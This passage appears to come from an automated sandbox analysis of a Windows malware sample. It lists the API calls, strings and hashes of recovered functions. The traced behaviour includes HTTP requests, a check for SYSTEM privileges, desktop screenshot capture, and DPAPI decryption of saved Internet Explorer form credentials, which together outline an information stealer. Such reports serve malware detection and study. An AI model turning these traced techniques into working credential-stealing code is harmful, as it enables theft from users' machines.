WinHttpConnect.WINHTTP(?,00000000,000001BB,00000000,?,?,?,?,0047835B,00000000), ref: 00433235

Part of subcall function 00437CFB: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,00000000), ref: 00437D20
Part of subcall function 00437CFB: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,?,?,00000000,00000000,?,?,00000000,00000000), ref: 00437D67

WinHttpConnect.WINHTTP(?,00000000,00000050,00000000,?,?,?,?,0047835B,00000000), ref: 00433292
WinHttpOpenRequest.WINHTTP(00000000,?,00000000,00000000,00000000,00000000,00800100,?,?,?,?,0047835B,00000000), ref: 00433314
WinHttpOpenRequest.WINHTTP(00000000,?,00000000,00000000,00000000,00000000,00000100,?,?,?,?,0047835B,00000000), ref: 00433385
_strlen.LIBCMT ref: 004333B2
_strlen.LIBCMT ref: 004333BC
WinHttpSendRequest.WINHTTP(00000000,Content-Type: text/plain; charset=UTF-8,000000FF,?,00000000,00000000,00000000,?,?,?,0047835B,00000000), ref: 004333D2
WinHttpReceiveResponse.WINHTTP(00000000,00000000,?,?,?,0047835B,00000000), ref: 004333E3
WinHttpQueryDataAvailable.WINHTTP(00000000,00000000,?,?,?,0047835B,00000000), ref: 004333FA
WinHttpReadData.WINHTTP(00000000,00000000,00000000,?,?,?,?,?,?,?,?,0047835B,00000000), ref: 00433425
GetLastError.KERNEL32(?,?,?,0047835B,00000000), ref: 004334DD
WinHttpCloseHandle.WINHTTP(00000000,?,?,?,0047835B,00000000), ref: 004334E7
WinHttpCloseHandle.WINHTTP(00000000,?,?,?,0047835B,00000000), ref: 004334EE
WinHttpCloseHandle.WINHTTP(?,?,?,?,0047835B,00000000), ref: 004334F8

Strings

%99[^:]://%99[^/]%99[^], xrefs: 0043318E
Content-Type: text/plain; charset=UTF-8, xrefs: 004333CC

Memory Dump Source

Source File: 0000001B.00000002.509918737.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001B.00000002.511430795.000000000046C000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: Http$CloseHandleOpenRequest$ByteCharConnectDataMultiWide_strlen$AvailableErrorH_prologLastQueryReadReceiveResponseSend
String ID: %99[^:]://%99[^/]%99[^]$Content-Type: text/plain; charset=UTF-8
API String ID: 1550182571-3818427525
Opcode ID: c140ccdb543451c87fc44ca5b63738a2db15bf84a9986ed1d773f96c6d3296ac
Instruction ID: 895cd0210418aeace856ce6e3d1a536679fccb76024a47a819fcc9431648de90
Opcode Fuzzy Hash: c140ccdb543451c87fc44ca5b63738a2db15bf84a9986ed1d773f96c6d3296ac
Instruction Fuzzy Hash: 73C16270901218EFDB15DFA5D985BEEBBB8FF09304F1040AAE805A7251DB785B48CF69

Uniqueness

Uniqueness Score: -1.00%

Function 00437E98, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 65memoryCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000008,?), ref: 00437EAA
OpenProcessToken.ADVAPI32(00000000), ref: 00437EB1
GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),00000000,00000000,00000000), ref: 00437ECB
GetLastError.KERNEL32 ref: 00437ED5
GlobalAlloc.KERNEL32(00000040,00000000), ref: 00437EE5
GetTokenInformation.KERNELBASE(?,TokenIntegrityLevel,00000000,00000000,00000000), ref: 00437EF9
ConvertSidToStringSidW.ADVAPI32(00000000,00000000), ref: 00437F0D
GlobalFree.KERNEL32 ref: 00437F2D

Strings

S-1-5-18, xrefs: 00437F1A

Memory Dump Source

Source File: 0000001B.00000002.509918737.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001B.00000002.511430795.000000000046C000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: Token$GlobalInformationProcess$AllocConvertCurrentErrorFreeLastOpenString
String ID: S-1-5-18
API String ID: 857934279-4289277601
Opcode ID: 7fd0681fea19df5dba31833373d15ba6f3a64dcdbb5177e0ff1ce7ce6f7368be
Instruction ID: cead6bba60a10db50cb2fec9eb9fed126fdd553e9ef975a159cb314d7d00d788
Opcode Fuzzy Hash: 7fd0681fea19df5dba31833373d15ba6f3a64dcdbb5177e0ff1ce7ce6f7368be
Instruction Fuzzy Hash: 0C112E75A04104FBEB209BE1DC88BAF7FB9FF48755F104066E541E1050EB748A04DBA9

Uniqueness

Uniqueness Score: -1.00%

Function 00409497, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 100COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0040949C
std::_Lockit::_Lockit.LIBCPMT ref: 004094AC
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 004094E9

Part of subcall function 0043E984: _Yarn.LIBCPMT ref: 0043E9A3
Part of subcall function 0043E984: _Yarn.LIBCPMT ref: 0043E9C7

std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 0040952A
std::_Lockit::~_Lockit.LIBCPMT ref: 0040959B

Strings

bad locale name, xrefs: 00409502

Memory Dump Source

Source File: 0000001B.00000002.509918737.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001B.00000002.511430795.000000000046C000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$Locinfo::_LockitYarn$H_prologLocinfo_ctorLocinfo_dtorLockit::_Lockit::~_
String ID: bad locale name
API String ID: 3232797784-1405518554
Opcode ID: 24d415fe188b48f7d4f7abfff9eca1e260f2b96384052e6691d7a0d10fc8f06d
Instruction ID: 481231959cc9e17b3fea0230e8c01387730e5cec325bd58d0ed4e405b9a1cccf
Opcode Fuzzy Hash: 24d415fe188b48f7d4f7abfff9eca1e260f2b96384052e6691d7a0d10fc8f06d
Instruction Fuzzy Hash: 1B314172401B40EEC7329F5B9841657FBF4BF88714B108A2FE05AA2A91DB78A905CF5D

Uniqueness

Uniqueness Score: -1.00%

Function 00412BD8, Relevance: 9.1, APIs: 6, Instructions: 53COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00412BDD
std::_Lockit::_Lockit.LIBCPMT ref: 00412BEB
int.LIBCPMT ref: 00412C02

Part of subcall function 004095B3: std::_Lockit::_Lockit.LIBCPMT ref: 004095C4
Part of subcall function 004095B3: std::_Lockit::~_Lockit.LIBCPMT ref: 004095DE

std::_Facet_Register.LIBCPMT ref: 00412C3C
std::_Lockit::~_Lockit.LIBCPMT ref: 00412C52
Concurrency::cancel_current_task.LIBCPMT ref: 00412C67

Memory Dump Source

Source File: 0000001B.00000002.509918737.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001B.00000002.511430795.000000000046C000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prologRegister
String ID:
API String ID: 2251497708-0
Opcode ID: 1235e44e81827bb8a8feafc755fa2d69f668b74e951576e50e51155fd843e108
Instruction ID: 7f9fa5811aca951dc981c0b2c80feed09a82350adfa3b40bea4f14039d2e0f4e
Opcode Fuzzy Hash: 1235e44e81827bb8a8feafc755fa2d69f668b74e951576e50e51155fd843e108
Instruction Fuzzy Hash: 8111C231901115ABCB15AB95C909AAE7764EB44718F10452FE510B73C1EBB89D41CBD8

Uniqueness

Uniqueness Score: -1.00%

Function 004549AA, Relevance: 7.7, APIs: 5, Instructions: 186COMMON

Download Yara Rule

APIs

Part of subcall function 00458230: RtlAllocateHeap.NTDLL(00000000,0043E6C3,00000000,?,0044058B,00000002,00000000,00401041,gC6oM0tV1p,?,00408EE6,0043E6C3,00000004,00000000,00000000,00000000), ref: 00458262

_free.LIBCMT ref: 00454AB9
_free.LIBCMT ref: 00454AD0
_free.LIBCMT ref: 00454AED
_free.LIBCMT ref: 00454B08
_free.LIBCMT ref: 00454B1F

Memory Dump Source

Source File: 0000001B.00000002.509918737.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001B.00000002.511430795.000000000046C000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: _free$AllocateHeap
String ID:
API String ID: 3033488037-0
Opcode ID: 0c7b4070398b1b1985953c57c64bbae2f4b143ae693bb43748e93f557f934850
Instruction ID: e865385b26c308bc00db429f87ed37670cd28d4627fa9515af3949ab37070d83
Opcode Fuzzy Hash: 0c7b4070398b1b1985953c57c64bbae2f4b143ae693bb43748e93f557f934850
Instruction Fuzzy Hash: FA51B531A402049FDB20DF69C841B6B77F4FF8472AB14456EE809DB252E739ED45CB48

Uniqueness

Uniqueness Score: -1.00%

Function 004516C2, Relevance: 4.6, APIs: 3, Instructions: 142COMMON

Download Yara Rule

APIs

Part of subcall function 0045626B: GetLastError.KERNEL32(?,?,?,00451585,00483AF0,00000008,0043E09B,?,00413D61,00000000,7FFFFFFF,?,00000000,00413A66), ref: 00456270
Part of subcall function 0045626B: SetLastError.KERNEL32(00000000,00000008,000000FF,?,?,?,00451585,00483AF0,00000008,0043E09B,?,00413D61,00000000,7FFFFFFF,?,00000000), ref: 0045630E

_free.LIBCMT ref: 00451771
_free.LIBCMT ref: 0045179F
_free.LIBCMT ref: 004517E7

Memory Dump Source

Source File: 0000001B.00000002.509918737.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001B.00000002.511430795.000000000046C000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: _free$ErrorLast
String ID:
API String ID: 3291180501-0
Opcode ID: 53a1ed3837c23ab9908f41e37b7a114fe3b0956c8b43053fa44c2269b5a8ad63
Instruction ID: f881ba9e8172bbb2def7329e79bdaf5780f01e3435248f57c7d84ef609e686ef
Opcode Fuzzy Hash: 53a1ed3837c23ab9908f41e37b7a114fe3b0956c8b43053fa44c2269b5a8ad63
Instruction Fuzzy Hash: B041A0316001019FD724DFACC885B6AB7F8EF49356B24066EE815C73A2EB39EC189B54

Uniqueness

Uniqueness Score: -1.00%

Function 00451826, Relevance: 4.6, APIs: 3, Instructions: 96COMMON

Download Yara Rule

APIs

__cftoe.LIBCMT ref: 00451852
__cftoe.LIBCMT ref: 00451884
_free.LIBCMT ref: 004518AA

Memory Dump Source

Source File: 0000001B.00000002.509918737.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001B.00000002.511430795.000000000046C000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: __cftoe$_free
String ID:
API String ID: 1303422935-0
Opcode ID: 85cf3555ae54e92ac861431d989334a4cc8fd23adf0f161421ce2c92af2395b1
Instruction ID: 55f1f51daabacb5688901f9d10c459e2c7ee82f5bd2482a4c2cd2cc0c51713eb
Opcode Fuzzy Hash: 85cf3555ae54e92ac861431d989334a4cc8fd23adf0f161421ce2c92af2395b1
Instruction Fuzzy Hash: 7721C7768042087ADF20BB96DC46FDF3BA8DF85326F20416BFC15E5193EA35CA48C659

Uniqueness

Uniqueness Score: -1.00%

Function 0045F6B5, Relevance: 4.6, APIs: 3, Instructions: 68COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 0045F6BE
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0045F72C

Part of subcall function 00459C34: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,?,00000000,00000000,00000000,?,0045BC6D,?,00000000,00000000), ref: 00459CD6

Part of subcall function 00458230: RtlAllocateHeap.NTDLL(00000000,0043E6C3,00000000,?,0044058B,00000002,00000000,00401041,gC6oM0tV1p,?,00408EE6,0043E6C3,00000004,00000000,00000000,00000000), ref: 00458262

_free.LIBCMT ref: 0045F71D

Memory Dump Source

Source File: 0000001B.00000002.509918737.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001B.00000002.511430795.000000000046C000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: EnvironmentStrings$AllocateByteCharFreeHeapMultiWide_free
String ID:
API String ID: 2560199156-0
Opcode ID: a6f20d2672015b03350ddb3cdf48012a8af764d8fa549fc8079abefeb1de257f
Instruction ID: c7c848a84ca1ecbbbe54b0703829ec6d80659dbbf86abe7758079540e043e69b
Opcode Fuzzy Hash: a6f20d2672015b03350ddb3cdf48012a8af764d8fa549fc8079abefeb1de257f
Instruction Fuzzy Hash: AC0184626026157B272126B71C89C7F69ADCACAB96714013EFD04D7243FE6CCC0F81BA

Uniqueness

Uniqueness Score: -1.00%

Function 004129F4, Relevance: 3.1, APIs: 2, Instructions: 53COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004129F9
std::locale::_Init.LIBCPMT ref: 00412A41

Part of subcall function 0043E884: std::_Lockit::_Lockit.LIBCPMT ref: 0043E896
Part of subcall function 0043E884: std::locale::_Setgloballocale.LIBCPMT ref: 0043E8B1
Part of subcall function 0043E884: _Yarn.LIBCPMT ref: 0043E8C7
Part of subcall function 0043E884: std::_Lockit::~_Lockit.LIBCPMT ref: 0043E907

Part of subcall function 00412B2D: __EH_prolog.LIBCMT ref: 00412B32

Memory Dump Source

Source File: 0000001B.00000002.509918737.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001B.00000002.511430795.000000000046C000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: H_prologLockitstd::_std::locale::_$InitLockit::_Lockit::~_SetgloballocaleYarn
String ID:
API String ID: 2277578679-0
Opcode ID: f93f73b9765a9d4073c4570fce376f245a8f822d9092f5d160d6a97e28ca0950
Instruction ID: 9b283f6742f5bf9496450d2bb4f9defdc20fadfecfde96d086a728bb7af7f28d
Opcode Fuzzy Hash: f93f73b9765a9d4073c4570fce376f245a8f822d9092f5d160d6a97e28ca0950
Instruction Fuzzy Hash: 40113DB1A00B05FFD304AF6AC5C1645FBA4FF48314B50922FE41997A81D7B9B860CB94

Uniqueness

Uniqueness Score: -1.00%

Function 00435146, Relevance: 3.0, APIs: 2, Instructions: 40synchronizationCOMMON

Download Yara Rule

APIs

OpenMutexA.KERNEL32 ref: 00435191
CreateMutexA.KERNELBASE(00000000,00000000,00000000), ref: 0043519E

Memory Dump Source

Source File: 0000001B.00000002.509918737.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001B.00000002.511430795.000000000046C000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: Mutex$CreateOpen
String ID:
API String ID: 4030545807-0
Opcode ID: 31c41ba1dec486880ba3054688290220258283e7379e08871f412edb1085e3de
Instruction ID: 0ad118b497f756d022d6c1dc44d543fb4a495e7f26a66be785e5516a73ecb4b1
Opcode Fuzzy Hash: 31c41ba1dec486880ba3054688290220258283e7379e08871f412edb1085e3de
Instruction Fuzzy Hash: 2CF08111D443C87ADF01ABF94C459FFBFBC5D1A349F00616DE845A3103E5A455458376

Uniqueness

Uniqueness Score: -1.00%

Function 00453393, Relevance: 3.0, APIs: 2, Instructions: 33COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 004533DB

Memory Dump Source

Source File: 0000001B.00000002.509918737.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001B.00000002.511430795.000000000046C000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 468fbbbce9b65a9a7ae4cf14111dcd3a08628f1db70a3e9b4c17d5a0f5bacebe
Instruction ID: aace2b924423b1b1d06ab9bebf612dae57df8941793e695e5fcfe6b784d2f65f
Opcode Fuzzy Hash: 468fbbbce9b65a9a7ae4cf14111dcd3a08628f1db70a3e9b4c17d5a0f5bacebe
Instruction Fuzzy Hash: 9CE0A03260A41052E3212A3B7C0526E01915BC13BBB11033FEC10CA6E3DFBC4A1E415F

Uniqueness

Uniqueness Score: -1.00%

Function 00411361, Relevance: 1.6, APIs: 1, Instructions: 50COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00411366

Part of subcall function 004121DF: __EH_prolog.LIBCMT ref: 004121E4

Part of subcall function 00412950: __EH_prolog.LIBCMT ref: 00412955
Part of subcall function 00412950: std::locale::_Init.LIBCPMT ref: 00412973

Memory Dump Source

Source File: 0000001B.00000002.509918737.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001B.00000002.511430795.000000000046C000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: H_prolog$Initstd::locale::_
String ID:
API String ID: 1266419734-0
Opcode ID: 315b668e8b7023b626fe4957d467b3f89b513f8bab3d7c320eabcb0d13abb0c8
Instruction ID: 8d42019b0d6cbb705c0667f22b1dda26f194fa9e96a5879c645356b3665c30de
Opcode Fuzzy Hash: 315b668e8b7023b626fe4957d467b3f89b513f8bab3d7c320eabcb0d13abb0c8
Instruction Fuzzy Hash: 281136B0A01606AFC744CF69C985A99FBF4FF48304F20852FA119D3701EBB4AA51CB98

Uniqueness

Uniqueness Score: -1.00%

Function 0045405C, Relevance: 1.5, APIs: 1, Instructions: 44COMMON

Download Yara Rule

APIs

Part of subcall function 004575AF: HeapAlloc.KERNEL32(00000008,?,00000000,?,0045640D,00000001,00000364,00000008,000000FF,?,0044058B,00000002,00000000,00401041,gC6oM0tV1p), ref: 004575F0

_free.LIBCMT ref: 0045407C

Part of subcall function 00457085: HeapFree.KERNEL32(00000000,00000000,?,0046050B,?,00000000,?,00000002,?,004607AE,?,00000007,?,?,00460BAF,?), ref: 0045709B
Part of subcall function 00457085: GetLastError.KERNEL32(?,?,0046050B,?,00000000,?,00000002,?,004607AE,?,00000007,?,?,00460BAF,?,?), ref: 004570AD

Memory Dump Source

Source File: 0000001B.00000002.509918737.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001B.00000002.511430795.000000000046C000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: Heap$AllocErrorFreeLast_free
String ID:
API String ID: 3091179305-0
Opcode ID: cac5cb4b32a9f3fe9cfb67e5adc77faa328d3782d704533d714b9891f35f0f0b
Instruction ID: 3e0d08a7504311dc66834f84b25196382ed2228b2cc14b6f98197e60959752a8
Opcode Fuzzy Hash: cac5cb4b32a9f3fe9cfb67e5adc77faa328d3782d704533d714b9891f35f0f0b
Instruction Fuzzy Hash: 25010CB6D00219AFCB10DFA5C841ADEBBF8FB48715F10412AEA14E7281E774AA44CB94

Uniqueness

Uniqueness Score: -1.00%

Function 004096A7, Relevance: 1.5, APIs: 1, Instructions: 36COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004096AC

Part of subcall function 00409497: __EH_prolog.LIBCMT ref: 0040949C
Part of subcall function 00409497: std::_Lockit::_Lockit.LIBCPMT ref: 004094AC
Part of subcall function 00409497: std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 004094E9

Part of subcall function 00409674: __Getctype.LIBCPMT ref: 0040968F

Part of subcall function 0040950D: std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 0040952A
Part of subcall function 0040950D: std::_Lockit::~_Lockit.LIBCPMT ref: 0040959B

Memory Dump Source

Source File: 0000001B.00000002.509918737.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001B.00000002.511430795.000000000046C000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$H_prologLocinfo::_Lockit$GetctypeLocinfo_ctorLocinfo_dtorLockit::_Lockit::~_
String ID:
API String ID: 1713013424-0
Opcode ID: 0f79ba62b55cc0919a053ccf09a0fc0e2031fbb7f01fc785885df53702b589ab
Instruction ID: a1014d657f2ebd527984027a8cfa0e23bdafda5c79f2413eb0d16409d638b87c
Opcode Fuzzy Hash: 0f79ba62b55cc0919a053ccf09a0fc0e2031fbb7f01fc785885df53702b589ab
Instruction Fuzzy Hash: 1FF09072900204AACB14EFA9C852B9EB774AF90714F10853FF415B72C2DF785E44CA99

Uniqueness

Uniqueness Score: -1.00%

Function 00458230, Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,0043E6C3,00000000,?,0044058B,00000002,00000000,00401041,gC6oM0tV1p,?,00408EE6,0043E6C3,00000004,00000000,00000000,00000000), ref: 00458262

Memory Dump Source

Source File: 0000001B.00000002.509918737.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001B.00000002.511430795.000000000046C000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: cd583beede7770b7d87f1fc94a27924dce370fb9fbb106eedfd9982ea2affe11
Instruction ID: 673a287964893305bc1dfe9fb30b5609e8ff153e76a36af575fd20c8dd790ddd
Opcode Fuzzy Hash: cd583beede7770b7d87f1fc94a27924dce370fb9fbb106eedfd9982ea2affe11
Instruction Fuzzy Hash: AEE0E531144A119BEB2126A36D01B5F3E49AF427A2F1500AFFC84BA293DF5CCC05C6ED

Uniqueness

Uniqueness Score: -1.00%

Function 004121DF, Relevance: 1.5, APIs: 1, Instructions: 31COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004121E4

Part of subcall function 0041299C: __EH_prolog.LIBCMT ref: 004129A1

Memory Dump Source

Source File: 0000001B.00000002.509918737.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001B.00000002.511430795.000000000046C000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 3df5ff43d7b73e9ecac21978bc5b743a34644d257c991a1f476ee5562c645d86
Instruction ID: 0fbfb87dd1fc47a0eefa1ef5478b716588c7148864a4a5de4540d3d932fa21ac
Opcode Fuzzy Hash: 3df5ff43d7b73e9ecac21978bc5b743a34644d257c991a1f476ee5562c645d86
Instruction Fuzzy Hash: 7EF014B8620654DFC725CF18C489D9ABBF8FB08308700895EE8898B701E7B5E900CB94

Uniqueness

Uniqueness Score: -1.00%

Function 0041299C, Relevance: 1.5, APIs: 1, Instructions: 29COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004129A1

Part of subcall function 004129F4: __EH_prolog.LIBCMT ref: 004129F9
Part of subcall function 004129F4: std::locale::_Init.LIBCPMT ref: 00412A41

Memory Dump Source

Source File: 0000001B.00000002.509918737.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001B.00000002.511430795.000000000046C000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: H_prolog$Initstd::locale::_
String ID:
API String ID: 1266419734-0
Opcode ID: 2d3150d69b4781b28ea71f4b5bf9338f0a03b5bd446fa47e2a3808009b8cb4eb
Instruction ID: b886d26eb5bd54d56e753313a6c1f283d28479231b0c863677bd72b1ed1f90d8
Opcode Fuzzy Hash: 2d3150d69b4781b28ea71f4b5bf9338f0a03b5bd446fa47e2a3808009b8cb4eb
Instruction Fuzzy Hash: 20F012B4A102119FC729CF0CC445E6ABBE4FB18304B00C56EA88AD7301D7B5E840CB98

Uniqueness

Uniqueness Score: -1.00%

Function 00412B2D, Relevance: 1.5, APIs: 1, Instructions: 29COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00412B32

Part of subcall function 00412BD8: __EH_prolog.LIBCMT ref: 00412BDD
Part of subcall function 00412BD8: std::_Lockit::_Lockit.LIBCPMT ref: 00412BEB
Part of subcall function 00412BD8: int.LIBCPMT ref: 00412C02
Part of subcall function 00412BD8: std::_Lockit::~_Lockit.LIBCPMT ref: 00412C52

Memory Dump Source

Source File: 0000001B.00000002.509918737.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001B.00000002.511430795.000000000046C000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: H_prologLockitstd::_$Lockit::_Lockit::~_
String ID:
API String ID: 1350124489-0
Opcode ID: 3c5519d1fa4e6fd7239b8132fa7d4870af9330ff307e2743f64683bad5b0380d
Instruction ID: 6837703cf7906422ce066163e0c4a9660398b58492d2aa550ae3de7ce5933b57
Opcode Fuzzy Hash: 3c5519d1fa4e6fd7239b8132fa7d4870af9330ff307e2743f64683bad5b0380d
Instruction Fuzzy Hash: 3FF05E75A001049FCB04EFA4C585EADB7F4FF48308F10815EE406AB351DB79ED05CA25

Uniqueness

Uniqueness Score: -1.00%

Function 00434E25, Relevance: 1.5, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

GetUserNameA.ADVAPI32(?,?), ref: 00434E40

Memory Dump Source

Source File: 0000001B.00000002.509918737.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001B.00000002.511430795.000000000046C000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: NameUser
String ID:
API String ID: 2645101109-0
Opcode ID: 61f5ba5c05d30305611304f49ad6eb72e951543a1afcd66fa6b76d218acbb846
Instruction ID: cdb59cd0f94429d4d66104043b97c2d866e40b7933060b8ae6305b36cffb063e
Opcode Fuzzy Hash: 61f5ba5c05d30305611304f49ad6eb72e951543a1afcd66fa6b76d218acbb846
Instruction Fuzzy Hash: 67D0C97480810DEBCF50DB90D989AC9B7BCAB00308F0004A294C1E3140EAF4ABC99B91

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0042B2AF, Relevance: 40.4, APIs: 22, Strings: 1, Instructions: 193windowmemoryfileCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0042B2B4
GdiplusStartup.GDIPLUS(?,?,00000000), ref: 0042B2E2
GetDesktopWindow.USER32 ref: 0042B2E8
GetWindowRect.USER32 ref: 0042B2F5
GetWindowDC.USER32(00000000), ref: 0042B2FC
GetDeviceCaps.GDI32(00000000,0000000C), ref: 0042B31C
CreateCompatibleDC.GDI32(00000000), ref: 0042B325
CreateDIBSection.GDI32(?,00000028,00000001,?,00000000,00000000), ref: 0042B370
DeleteDC.GDI32(00000000), ref: 0042B384
DeleteDC.GDI32(?), ref: 0042B389
SaveDC.GDI32(00000000), ref: 0042B390
SelectObject.GDI32(00000000,?), ref: 0042B39C
BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 0042B3B5
RestoreDC.GDI32(00000000,00000000), ref: 0042B3BD
DeleteDC.GDI32(00000000), ref: 0042B3CA
DeleteDC.GDI32(?), ref: 0042B3CF
GdipAlloc.GDIPLUS(00000010), ref: 0042B3D3
GdipCreateBitmapFromHBITMAP.GDIPLUS(?,00000000,?), ref: 0042B3F3
_mbstowcs.LIBCMT ref: 0042B466
GdipSaveImageToFile.GDIPLUS(?,00000000,?,?), ref: 0042B483
DeleteObject.GDI32(00000010), ref: 0042B4A8
GdiplusShutdown.GDIPLUS(?), ref: 0042B4B1

Part of subcall function 00412593: _Deallocate.LIBCONCRT ref: 004125A2

Strings

(, xrefs: 0042B344

Memory Dump Source

Source File: 0000001B.00000002.509918737.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001B.00000002.511430795.000000000046C000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: Delete$CreateGdipWindow$GdiplusObjectSave$AllocBitmapCapsCompatibleDeallocateDesktopDeviceFileFromH_prologImageRectRestoreSectionSelectShutdownStartup_mbstowcs
String ID: (
API String ID: 4140672344-3887548279
Opcode ID: 3dec3a1f461d008d9c61927e4e615c024b73b0876d7646e9d68b21660375fbd7
Instruction ID: 86d7f8cd0aa5ab3a7ab887917594f4801dea4885b19a4acf7a0b73a41150736d
Opcode Fuzzy Hash: 3dec3a1f461d008d9c61927e4e615c024b73b0876d7646e9d68b21660375fbd7
Instruction Fuzzy Hash: 127103B2D00219EFDB15DFA5DC89AAEBBB8FF08340F10412AE956E3211E7745901CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 00429094, Relevance: 28.2, APIs: 14, Strings: 2, Instructions: 169encryptionstringCOMMON

Download Yara Rule

APIs

CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000), ref: 004290B9
CryptCreateHash.ADVAPI32(?,00008004,00000000,00000000,?), ref: 004290DA
lstrlenW.KERNEL32 ref: 004290E9
CryptHashData.ADVAPI32(?,?,00000000,00000000), ref: 004290FC
CryptGetHashParam.ADVAPI32(?,00000002,?,?,00000000,?,00000000,00000000), ref: 0042911F
wsprintfW.USER32 ref: 0042915B
lstrcatW.KERNEL32(00000000,?), ref: 00429169
wsprintfW.USER32 ref: 00429189
lstrcatW.KERNEL32(00000000,?), ref: 00429197
CryptDestroyHash.ADVAPI32(?,?,00000000,00000000), ref: 004291A0
CryptReleaseContext.ADVAPI32(?,00000000), ref: 004291AB
lstrlenW.KERNEL32 ref: 004291F2
CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,00000001,?), ref: 00429215
LocalFree.KERNEL32(00000000), ref: 0042924E

Strings

Software\Microsoft\Internet Explorer\IntelliForms\Storage2, xrefs: 004291C5
%02X, xrefs: 00429155, 00429183

Memory Dump Source

Source File: 0000001B.00000002.509918737.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001B.00000002.511430795.000000000046C000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: Crypt$Hash$ContextDatalstrcatlstrlenwsprintf$AcquireCreateDestroyFreeLocalParamReleaseUnprotect
String ID: %02X$Software\Microsoft\Internet Explorer\IntelliForms\Storage2
API String ID: 1004607082-2450551051
Opcode ID: eead699601e6a528cd9e4f1890e99558e59ff1eb628044586d2e211705026b5a
Instruction ID: 3a8bf6d4c04c3be4e2a3e59cd981c456e6dff5bbf6e0cb4edc504c9b715a5dd3
Opcode Fuzzy Hash: eead699601e6a528cd9e4f1890e99558e59ff1eb628044586d2e211705026b5a
